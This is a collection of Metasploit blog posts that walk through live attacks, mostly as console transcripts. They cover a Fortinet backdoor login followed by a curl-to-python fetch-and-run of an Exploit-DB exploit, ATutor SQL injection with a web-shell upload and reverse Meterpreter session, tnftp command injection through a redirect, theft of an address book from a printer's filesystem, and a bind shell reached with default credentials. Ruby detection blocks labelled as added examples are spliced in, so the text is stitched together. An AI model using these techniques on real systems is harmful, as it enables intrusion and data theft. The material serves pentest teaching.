Metasploit Blog

5 posts authored by: William Vu

Weekly Metasploit Wrapup

Posted by William Vu, Mar 14, 2016

Scanning for the Fortinet backdoor with Metasploit

 

Written by wvu

 

Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out!

 

wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL
msf > use auxiliary/scanner/ssh/fortinet_backdoor 
msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24
rhosts => 417.216.55.0/24
msf auxiliary(fortinet_backdoor) > set threads 100
threads => 100
msf auxiliary(fortinet_backdoor) > run

[*] Scanned 35 of 256 hosts (13% complete)
[*] Scanned 84 of 256 hosts (32% complete)
[*] Scanned 90 of 256 hosts (35% complete)
[+] 417.216.55.69:22 - Logged in as Fortimanager_Access
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 174 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 233 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(fortinet_backdoor) > 
[1]+ Stopped ./msfconsole -qL
wvu@kharak:~/metasploit-framework:master$ python <(curl -s https://www.exploit-db.com/download/39224) 417.216.55.69
FortiGate-VM64 # 
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
exit Exit the CLI.

FortiGate-VM64#


Easy as can be.

 

The module doesn't get sessions yet due to complications with net-ssh, but we're working on it!

 

Shall we play a game, ATutor?

 

Written by Bill Webb

 


 

Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies?  Now you can with the addition of the ATutor 2.2.1 SQL injection module.  This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrator's interface.  While reaching the vulnerability requires one to log in to ATutor as a student, remote registration is enabled by default.  Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ...

 

msf exploit(atutor_sqli) > check
[+] The target is vulnerable.
msf exploit(atutor_sqli) > exploit

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] 192.168.1.202:80 - Logged in as admin, sending a few test injections...
[*] 192.168.1.202:80 - Dumping username and password hash...
[+] 192.168.1.202:80 - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !
[*] 192.168.1.202:80 - Logged in as admin, uploading shell...
[+] 192.168.1.202:80 - Shell upload successful!
[*] Sending stage (33684 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.202:49271) at 2016-02-29 18:44:11 -0600
[+] 192.168.1.202:80 - Deleted ocfw.php
[+] 192.168.1.202:80 - Deleted ../../content/module/qee/ocfw.php

meterpreter >


... or pulling off their best Matthew Broderick impersonation.

 

[Image: grades.gif]

 

It's almost like it's 1983 again.

 

(We can't guarantee that the ladies will in fact be impressed ...)

 

New modules

 

Exploit modules (3 new)

 

Auxiliary and post modules (6 new)

 

Get it

 

As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.

 

It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug, which remains unpatched today on a fairly popular operating system? Read on...

 

popen()'ing an RCE present

Shortly before Halloween, I was reading the oss-sec mailing list when I stumbled upon a pretty cool (almost tragic) bug in the ftp(1) command on {Free,Net,DragonFly}BSD and OS X.

 

The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:

This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource.

If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource.

If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function.

 

Okay, so how do we use this thing?

We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy:

 

msf > use auxiliary/server/tnftp_savefile   
msf auxiliary(tnftp_savefile) > set uripath /  
uripath => /  
msf auxiliary(tnftp_savefile) > set urihost [redacted]  
urihost => [redacted]  
msf auxiliary(tnftp_savefile) > set uriport 80  
uriport => 80  
msf auxiliary(tnftp_savefile) > run  
[*] Auxiliary module execution completed  
msf auxiliary(tnftp_savefile) >   
[*] Using URL: http://0.0.0.0:8080/  
[*]  Local IP: http://10.6.0.59:8080/  
[*] Server started.  

 

Don't worry about the URIHOST or URIPORT advanced options unless you're working through a tunnel. Just set URIPATH to / to allow any URL to redirect to the exploit.

 

Triggering the vulnerability

Here we are triggering the vuln on a fully patched OS X Yosemite system:

 

wvu@hiigara:~$ ftp http://[redacted]/index.html  
Requesting http://[redacted]/index.html  
Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61  
Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61  
     0        0.00 KiB/s Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64  
     0        0.00 KiB/s   
wvu@hiigara:~$ 

 

Thanks to the redirect, we can hide the true purpose of our URL until it's too late.
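The savefile derivation described in the module text above, and the percent-encoded redirect target from the session, as an added example written for this page (not tnftp's or Metasploit's code): it derives the output name the way the description says tnftp does, flags names that would reach popen(), and shows the check a hardened client would apply before accepting a server-chosen filename. Host names are constructed placeholders.

```ruby
require 'uri'

# Added example for this page, not tnftp's or Metasploit's code. It mirrors
# the behaviour the module description gives: without -o, tnftp takes the last
# path component of the requested resource as the output filename ("savefile"),
# and a savefile beginning with "|" is handed to popen(). Host names below are
# constructed placeholders.

# Percent-decode a single path component (the '+'-as-space rule is not applied,
# since this is a path component, not a form field).
def percent_decode(component)
  component.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# Derive the savefile the way the description says tnftp does.
def savefile_for(url)
  path = URI.parse(url).path
  percent_decode(path.split('/').last.to_s)
end

# True when the derived savefile would be treated as a command pipeline.
def pipe_savefile?(url)
  savefile_for(url).start_with?('|')
end

# Hardened resolution for a client: refuse pipe-like or empty names rather
# than passing them on, forcing the caller to supply an explicit output name.
def safe_savefile(url)
  name = savefile_for(url)
  if name.empty? || name.start_with?('|')
    raise ArgumentError, "refusing unsafe savefile #{name.inspect}; use an explicit output name"
  end
  name
end

# Review a sequence of requested/redirected URLs (e.g. from a proxy log) and
# report the derived savefile for each, flagging the risky ones.
def audit_fetch_chain(urls)
  urls.map do |url|
    { url: url, savefile: savefile_for(url), pipe: pipe_savefile?(url) }
  end
end

# Constructed sample reproducing the shape of the session above: an innocent
# request followed by a redirect whose last component percent-encodes "|uname -a".
SAMPLE_CHAIN = [
  'http://example.invalid/index.html',
  'http://example.invalid:80/%7c%75%6e%61%6d%65%20%2d%61',
].freeze

if $PROGRAM_NAME == __FILE__
  audit_fetch_chain(SAMPLE_CHAIN).each do |entry|
    flag = entry[:pipe] ? 'PIPE' : 'ok'
    puts "#{flag.ljust(4)} #{entry[:url]} -> savefile #{entry[:savefile].inspect}"
  end
end
```

Running the block prints the decoded savefile for each URL in the chain; the redirect target resolves to a name starting with "|", which is exactly the condition the module description says triggers popen(). The same `audit_fetch_chain` check can be run over proxy logs to spot redirects aimed at this bug, and `safe_savefile` is the shape of the guard a client should have in place when it lets the server pick the output filename.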

 

Back in msfconsole, we can see the results of our attack:

 

[*] 10.6.0.59        tnftp_savefile - tnftp/20070806 connected
[*] 10.6.0.59        tnftp_savefile - Redirecting to exploit...
[+] 10.6.0.59        tnftp_savefile - Executing `uname -a'!



 

That's really all there is to it! Happy hacking!

Hello, Metasploiters! Just wanted to update y'all on a new feature in msfconsole that *hopefully* should make vgrepping through module options a little easier.

 

Show empty required options

 

The new command is show missing, and all it does is show empty required options. Instead of looking through a long list of options and picking out the required ones that haven't been set, just run show missing, and a list of unset required options will be shown.

 

Here's an example with smb_login:


 

 

Pretty snazzy, huh?

 

It also works on payload options, as we can see with good ol' ms08_067_netapi:


 

 

That's all there is to it!

As of this last release, PJL (HP's Printer Job Language) is now a grown-up Rex::Proto protocol! Since extending a protocol in Metasploit is beyond the scope of this post, we'll just be covering how to use the PoC modules included with the new protocol. Feel free to dig around in lib/rex/proto/pjl*, though!

 

Okay, let's get started!

 

printer_version_info

 

First off, we have printer_version_info. This module lets us scan a range of hosts for printer version information. We'll set RHOSTS globally so we don't need to worry about setting it later. :)

 

msf > use auxiliary/scanner/printer/printer_version_info 
msf auxiliary(printer_version_info) > setg RHOSTS 417.216.55.69
RHOSTS => 417.216.55.69
msf auxiliary(printer_version_info) > run

[+] 417.216.55.69:9100 - HP LaserJet M5035 MFP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

As you can see, our target is an HP LaserJet M5035 MFP. This gives us a good idea of what to expect while running later modules.

 

printer_env_vars

 

printer_env_vars will get us a list of environment variables on the printer. This information isn't necessarily useful for what we're about to do, but it does give us information about the printer's configuration.

 

msf auxiliary(printer_version_info) > use auxiliary/scanner/printer/printer_env_vars 
msf auxiliary(printer_env_vars) > run

[+] 417.216.55.69:9100
LANG=ENGLISH [22 ENUMERATED]
     ENGLISH
     FRENCH
     GERMAN
     ITALIAN
     SPANISH
     SWEDISH
     DANISH
     NORWEGIAN
     DUTCH
     FINNISH
     PORTUGUESE
     TURKISH
     POLISH
     RUSSIAN
     CZECH
     HUNGARIAN
     CATALAN
     ΑΓΓΛΙΚΑ
     ENGLISH
     ENGLISH
     ENGLISH
     ENGLISH
[snip]

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

Since the listing is so long, we've snipped off everything past the language setting.

 

printer_list_volumes

 

Now we're going to start mucking with the printer's filesystem. We can list the initialized volumes using printer_list_volumes.

 

msf auxiliary(printer_env_vars) > use auxiliary/scanner/printer/printer_list_volumes 
msf auxiliary(printer_list_volumes) > run

[+] 417.216.55.69:9100
        VOLUME  TOTAL SIZE      FREE SPACE      LOCATION    LABEL   STATUS
        0:      119754063872    119613587456    DISK 3      ?       READ-WRITE

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

That's a lot of free space! Volume 0: has over a hundred gigs of readable/writable free space. Someone should implement FSDOWNLOAD to take advantage of that. ;)

 

printer_list_dir

 

Let's snoop around in 0:\ with printer_list_dir. Take a close look at the directories that pop up. Printers are unassuming, which leads many people to consider them harmless. In reality, much of what people send through a printer may be stored, or at least logged, on its filesystem. Yeah, it has a disk. Scary, huh?

 

msf auxiliary(printer_list_volumes) > use auxiliary/scanner/printer/printer_list_dir 
msf auxiliary(printer_list_dir) > set PATHNAME '0:\'
PATHNAME => 0:\
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
PermStore TYPE=DIR
saveDevice TYPE=DIR
webServer TYPE=DIR
FaxIn TYPE=DIR
Fax TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > set PATHNAME '0:\saveDevice'
PATHNAME => 0:\saveDevice
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
CertMgmt TYPE=DIR
DigitalSend TYPE=DIR
ScanJobs TYPE=DIR
SavedJobs TYPE=DIR
SecurityAttrs TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > set PATHNAME '0:\saveDevice\DigitalSend'
PATHNAME => 0:\saveDevice\DigitalSend
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
Jobs TYPE=DIR
ImagePipeline TYPE=DIR
Log TYPE=DIR
AddressBook TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > set PATHNAME '0:\saveDevice\DigitalSend\AddressBook'
PATHNAME => 0:\saveDevice\DigitalSend\AddressBook
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
EmailPDL TYPE=DIR
FolderDestPDL TYPE=DIR
NetFolderPDL TYPE=DIR
speeddial.state TYPE=FILE SIZE=6
speeddial.db TYPE=FILE SIZE=2560
speeddial.bak TYPE=FILE SIZE=2560
email.state TYPE=FILE SIZE=6
email.db TYPE=FILE SIZE=16384
email.bak TYPE=FILE SIZE=16384
fax.state TYPE=FILE SIZE=6
fax.db TYPE=FILE SIZE=2560
fax.bak TYPE=FILE SIZE=2560

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

email.db looks interesting!

 

printer_download_file

 

Okay, so we found an interesting file (0:\saveDevice\DigitalSend\AddressBook\email.db) with printer_list_dir. We can now use printer_download_file to download it. The file will be stored in loot.

 

msf auxiliary(printer_list_dir) > use auxiliary/scanner/printer/printer_download_file 
msf auxiliary(printer_download_file) > set PATHNAME '0:\saveDevice\DigitalSend\AddressBook\email.db'
PATHNAME => 0:\saveDevice\DigitalSend\AddressBook\email.db
msf auxiliary(printer_download_file) > run

[+] 417.216.55.69:9100 - 0:\saveDevice\DigitalSend\AddressBook\email.db
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_download_file) > loot 

Loot
====

host           service  type          name                                            content                   info          path
----           -------  ----          ----                                            -------                   ----          ----
417.216.55.69           printer.file  0:\saveDevice\DigitalSend\AddressBook\email.db  application/octet-stream  Printer file  /home/theplague/.msf4/loot/20140123145418_default_417.216.55.69_printer.file_564610.db

msf auxiliary(printer_download_file) > strings /home/theplague/.msf4/loot/20140123145418_default_417.216.55.69_printer.file_564610.db | tr A-Z a-z | sort -u
[*] exec: strings /home/theplague/.msf4/loot/20140123145418_default_417.216.55.69_printer.file_564610.db | tr A-Z a-z | sort -u

zerocool@nyse
acidburn@otv
joey@gibson

 

E-mail addresses! Just one of the many things you might find on a printer filesystem... Obviously, the real addresses have been replaced by fake ones, but the significance of this find is the same. In this case, those could have been organization e-mail addresses, which means you would now have usernames you could leverage for further attacks.

 

printer_ready_message

 

Okay, phew, we're done with the serious stuff, so let's have a little fun! There's an old trick to change the message on a printer's LCD screen. We're going to use printer_ready_message for that.

 

Here, we're changing the display to something you all should know. :P

 

msf auxiliary(printer_download_file) > use auxiliary/scanner/printer/printer_ready_message 
msf auxiliary(printer_ready_message) > set ACTION Change 
ACTION => Change
msf auxiliary(printer_ready_message) > set MESSAGE HACK THE PLANET
MESSAGE => HACK THE PLANET
msf auxiliary(printer_ready_message) > run

[+] 417.216.55.69:9100 - HACK THE PLANET
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


 

 

It's probably a good idea to reset the display once you're done trolling. Just set ACTION to Reset and hit run!

 

msf auxiliary(printer_ready_message) > set ACTION Reset 
ACTION => Reset
msf auxiliary(printer_ready_message) > run

[+] 417.216.55.69:9100 - Processing...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


 

 

Like a ghost. ;)
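The modules walked through above all talk PJL to port 9100, so the same traffic is what a defender would inspect to tell a directory listing or file download apart from an ordinary print job. The following is an added example written for this page, not Rex::Proto::PJL or the modules' own code: it classifies the PJL commands in a captured port-9100 stream by risk and parses a directory listing in the format shown above. The command names are standard PJL (HP's PJL Technical Reference Manual); which commands the Metasploit modules actually send is not shown on this page and is an assumption here, as is the sample stream.

```ruby
# Added example for this page, not Rex::Proto::PJL or the modules' own code.
# Classifies raw data sent to a printer's port 9100 (as a network sensor would
# capture it) by PJL command, so filesystem reads and writes stand out from
# ordinary print jobs. Command names are standard PJL (HP's PJL Technical
# Reference Manual); the commands the Metasploit modules send are assumed.

# Risk tier per PJL command: filesystem transfers and writes rank highest.
PJL_RISK = {
  'INFO'       => :low,      # device/variable enumeration
  'FSQUERY'    => :medium,   # file metadata
  'FSDIRLIST'  => :medium,   # directory listing
  'RDYMSG'     => :medium,   # control-panel message
  'OPMSG'      => :medium,
  'STMSG'      => :medium,
  'FSUPLOAD'   => :high,     # read a file off the printer
  'FSDOWNLOAD' => :high,     # write a file onto the printer
  'FSAPPEND'   => :high,
  'FSDELETE'   => :high,
  'FSMKDIR'    => :high,
}.freeze

# Split a raw stream into PJL command records. The UEL (ESC %-12345X) that
# frames a PJL job is ignored; each "@PJL <COMMAND> ..." line is one record.
def pjl_commands(stream)
  stream.scan(/@PJL[ \t]+([A-Z]+)([^\r\n]*)/).map do |command, args|
    {
      command: command,
      risk: PJL_RISK.fetch(command, :unknown),
      path: args[/NAME="([^"]*)"/, 1],
      display: args[/DISPLAY="([^"]*)"/, 1],
    }
  end
end

# Return only the records at or above the given tier; unknown commands are
# treated as high so that anything unexpected is surfaced.
def pjl_alerts(stream, minimum: :high)
  ranks = { low: 0, medium: 1, high: 2, unknown: 2 }
  pjl_commands(stream).select { |rec| ranks[rec[:risk]] >= ranks[minimum] }
end

# Parse FSDIRLIST output of the form shown above ("name TYPE=DIR",
# "name TYPE=FILE SIZE=2560") into structured entries.
def parse_dirlist(text)
  text.lines.map do |line|
    m = line.match(/\A\s*(\S+)\s+TYPE=(DIR|FILE)(?:\s+SIZE=(\d+))?/)
    m && { name: m[1], type: m[2] == 'DIR' ? :dir : :file, size: m[3] && m[3].to_i }
  end.compact
end

# Constructed sample of what a sensor might capture on port 9100 during a
# session like the one above (commands assumed; paths taken from the listing).
SAMPLE_STREAM = "\e%-12345X@PJL INFO ID\r\n" \
  "@PJL FSDIRLIST NAME=\"0:\\saveDevice\\DigitalSend\\AddressBook\" ENTRY=1 COUNT=99\r\n" \
  "@PJL FSUPLOAD NAME=\"0:\\saveDevice\\DigitalSend\\AddressBook\\email.db\" OFFSET=0 SIZE=16384\r\n" \
  "@PJL RDYMSG DISPLAY=\"HACK THE PLANET\"\r\n" \
  "\e%-12345X"

# Constructed excerpt in the same shape as the printer_list_dir output above.
SAMPLE_DIRLIST = <<~LISTING
  . TYPE=DIR
  .. TYPE=DIR
  EmailPDL TYPE=DIR
  email.state TYPE=FILE SIZE=6
  email.db TYPE=FILE SIZE=16384
LISTING

if $PROGRAM_NAME == __FILE__
  pjl_alerts(SAMPLE_STREAM).each do |a|
    puts "ALERT #{a[:risk]} #{a[:command]} #{a[:path]}"
  end
  parse_dirlist(SAMPLE_DIRLIST).each { |e| puts "#{e[:type]} #{e[:name]} #{e[:size]}" }
end
```

Run stand-alone, the block alerts on the FSUPLOAD of email.db and prints the parsed listing. The point of the tiers is that a print server or sensor watching port 9100 only ever needs to see print data and the occasional INFO query; any FS* command from a host that is not a printer administrator is worth an alert, and the NAME path tells the responder exactly what was read or written.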

 

Conclusion

 

If you're new to Metasploit, never fear! You can download it here. If you already have Metasploit installed, these modules are only an msfupdate away!

 

Credits

 

This post is the ninth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

 

A few months ago, contributor geyslan submitted a cool pull request for a random-port bind shell payload on x86 and x64 Linux systems.

 

In this post, we'll explore how to use this payload with our friends Nmap and Ndiff. Let's get hacking!

 

Why should I use this thing?

 

Well, if you can use a reverse shell or a traditional bind shell, do that! The primary benefit of shell_bind_tcp_random_port is its size. By avoiding the bind call, the payload is a fair bit smaller than your usual bind shell. This could be useful if you have a severe size restriction on your payload.

 

Metasploitable

 

We're using Metasploitable for our vulnerable host. Just boot up the VM with host-only networking enabled, and you should be good to go. In this case, Metasploitable is at 172.16.126.129.

 

Nmap

 

First, we need to get a list of open ephemeral ports using Nmap. An ephemeral port is just a port that the OS assigns automatically and temporarily. Our payload will bind to one of these ports. We use a little shell magic to parse the ephemeral port range in /proc/sys/net/ipv4/ip_local_port_range and feed it to Nmap. We also need to save the scan results to before.xml in order to use Ndiff later.

 

root@kharak:~# nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX before.xml --open --send-ip 172.16.126.129

Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 11:59 CST
Initiating SYN Stealth Scan at 11:59
Scanning 172.16.126.129 [28233 ports]
Discovered open port 33395/tcp on 172.16.126.129
Discovered open port 47431/tcp on 172.16.126.129
Discovered open port 49712/tcp on 172.16.126.129
Discovered open port 51488/tcp on 172.16.126.129
Completed SYN Stealth Scan at 11:59, 0.31s elapsed (28233 total ports)
Nmap scan report for 172.16.126.129
Host is up (0.00014s latency).
Not shown: 28229 closed ports
PORT      STATE SERVICE
33395/tcp open  unknown
47431/tcp open  unknown
49712/tcp open  unknown
51488/tcp open  unknown
MAC Address: 00:0C:29:3D:5A:9B (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB)

 

As you can see, ports {33395,47431,49712,51488}/tcp are open in the ephemeral port range.

 

Metasploit

 

Next, we need to exploit the system. We're using exploit/multi/ssh/sshexec here, since we know that Metasploitable has SSH open with default creds msfadmin:msfadmin.

 

Make sure to use the payload linux/x86/shell_bind_tcp_random_port. That's why we're here, right? :)

 

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > setg RHOST 172.16.126.129
RHOST => 172.16.126.129
msf exploit(sshexec) > set USERNAME msfadmin
USERNAME => msfadmin
msf exploit(sshexec) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf exploit(sshexec) > set PAYLOAD linux/x86/shell_bind_tcp_random_port
PAYLOAD => linux/x86/shell_bind_tcp_random_port
msf exploit(sshexec) > exploit

[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress -  38.67% done (268/693 bytes)
[*] Command Stager progress - 100.00% done (693/693 bytes)

 

We won't get a session from this, since Metasploit doesn't know which port the payload is running on (by nature of the payload).

 

Nmap and Ndiff

 

Almost there! Now we need to scan the host again to get the new state of open ephemeral ports. We save the results to after.xml.

 

After that, we can use Ndiff on before.xml and after.xml, which reveals the port our bind shell is listening on.

 

root@kharak:~# ^before^after
nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX after.xml --open --send-ip 172.16.126.129

Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 12:00 CST
Initiating SYN Stealth Scan at 12:00
Scanning 172.16.126.129 [28233 ports]
Discovered open port 51488/tcp on 172.16.126.129
Discovered open port 49712/tcp on 172.16.126.129
Discovered open port 33395/tcp on 172.16.126.129
Discovered open port 47431/tcp on 172.16.126.129
Discovered open port 36503/tcp on 172.16.126.129
Completed SYN Stealth Scan at 12:01, 0.27s elapsed (28233 total ports)
Nmap scan report for 172.16.126.129
Host is up (0.00012s latency).
Not shown: 28228 closed ports
PORT      STATE SERVICE
33395/tcp open  unknown
36503/tcp open  unknown
47431/tcp open  unknown
49712/tcp open  unknown
51488/tcp open  unknown
MAC Address: 00:0C:29:3D:5A:9B (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB)
root@kharak:~# ndiff {before,after}.xml
-Nmap 6.00 scan initiated Thu Jan 02 11:59:37 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX before.xml --open --send-ip 172.16.126.129
+Nmap 6.00 scan initiated Thu Jan 02 12:00:59 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX after.xml --open --send-ip 172.16.126.129

172.16.126.129, 00:0C:29:3D:5A:9B:
-Not shown: 28229 closed ports
+Not shown: 28228 closed ports
PORT      STATE SERVICE VERSION
+36503/tcp open 

 

Our bind shell is on port 36503/tcp!
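The before/after comparison in the steps above (Nmap's -oX output diffed with Ndiff, plus the sed one-liner that turns ip_local_port_range into a port spec) is the same baseline-versus-current check a defender runs to catch a new listener appearing on a host. The following is an added example written for this page, not Nmap's, Ndiff's or Metasploit's code: it implements that comparison on Nmap XML with Ruby's standard library. The XML documents are constructed to mirror the two scans above.

```ruby
require 'rexml/document'

# Added example for this page, not Nmap's or Ndiff's code: the before/after
# comparison done on Nmap's -oX output with REXML, plus the conversion from
# /proc/sys/net/ipv4/ip_local_port_range to the "low-high" form nmap -p takes.
# The XML below is constructed to mirror the scan results above.

# "32768\t61000\n" (the format of ip_local_port_range) becomes "32768-61000",
# which is what the sed 's/\t/-/' one-liner above produces.
def port_range_spec(proc_contents)
  low, high = proc_contents.split
  "#{low}-#{high}"
end

# Map each host address to its open "port/proto" strings from an Nmap XML run.
def open_ports(xml)
  doc = REXML::Document.new(xml)
  hosts = {}
  REXML::XPath.each(doc, '//host') do |host|
    addr = REXML::XPath.first(host, 'address').attributes['addr']
    hosts[addr] = []
    REXML::XPath.each(host, 'ports/port') do |port|
      state = REXML::XPath.first(port, 'state').attributes['state']
      next unless state == 'open'
      hosts[addr] << "#{port.attributes['portid']}/#{port.attributes['protocol']}"
    end
  end
  hosts
end

# Ports open in the second scan but not the first, per host (Ndiff's "+" lines).
# A host present only in the second scan reports all of its open ports as new.
def new_listeners(before_xml, after_xml)
  before = open_ports(before_xml)
  open_ports(after_xml).each_with_object({}) do |(addr, ports), diff|
    added = ports - before.fetch(addr, [])
    diff[addr] = added unless added.empty?
  end
end

# Build a minimal Nmap-style XML document for one host with the given open
# TCP ports (constructed test data, not real scanner output).
def nmap_xml(addr, ports)
  entries = ports.map do |p|
    %(<port protocol="tcp" portid="#{p}"><state state="open" reason="syn-ack"/></port>)
  end.join
  %(<?xml version="1.0"?><nmaprun scanner="nmap"><host><status state="up"/>) +
    %(<address addr="#{addr}" addrtype="ipv4"/><ports>#{entries}</ports></host></nmaprun>)
end

# Constructed to match the two scans above.
BEFORE_XML = nmap_xml('172.16.126.129', [33395, 47431, 49712, 51488])
AFTER_XML  = nmap_xml('172.16.126.129', [51488, 49712, 33395, 47431, 36503])

if $PROGRAM_NAME == __FILE__
  puts "-p #{port_range_spec("32768\t61000\n")}"
  new_listeners(BEFORE_XML, AFTER_XML).each do |addr, ports|
    puts "#{addr}: newly open #{ports.join(', ')}"
  end
end
```

Run stand-alone, it prints the port spec and the single new listener, 36503/tcp, that Ndiff reported above. Because the comparison is per host and ignores port order, the same function works on a full-network baseline scan: schedule the scan, keep the previous XML, and alert on anything `new_listeners` returns, which is how an unexpected bind shell in the ephemeral range gets noticed by the defender rather than just by the attacker.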

 

Metasploit

 

Finally, we can pop a shell with exploit/multi/handler. Just set PAYLOAD to linux/x86/shell_bind_tcp, LPORT to the port you found with Ndiff, and hit exploit! We already set RHOST globally when we used exploit/multi/ssh/sshexec. :)

 

msf exploit(sshexec) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(handler) > set LPORT 36503
LPORT => 36503
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (172.16.126.1:41368 -> 172.16.126.129:36503) at 2014-01-02 12:01:39 -0600

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

 

And there you have it! We got a shell. :D

 

Conclusion

 

If you're new to Metasploit and want to try your hand at some awesome hax, you can download it here. Hack the planet!
